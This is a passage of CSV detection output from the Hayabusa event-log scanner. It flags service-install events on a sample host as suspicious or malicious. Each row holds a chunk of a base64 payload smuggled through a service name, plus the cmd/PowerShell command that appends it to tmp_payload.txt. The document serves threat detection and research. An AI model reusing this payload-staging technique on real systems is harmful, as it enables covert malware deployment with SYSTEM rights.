JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:49.957 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:51.401 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:51.401 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:51.401 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:52.841 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:52.841 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:52.841 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:54.310 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:54.310 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:54.310 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:55.761 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:55.761 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:55.761 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:57.214 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:57.214 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:57.214 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:58.655 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:58.655 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:58.655 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:00.108 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:00.108 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:00.108 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:01.550 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:01.550 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:01.550 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:03.020 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:03.020 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:03.020 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:04.472 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:04.472 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:04.472 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:05.916 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:05.916 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:05.916 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:07.360 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:07.360 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:07.360 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 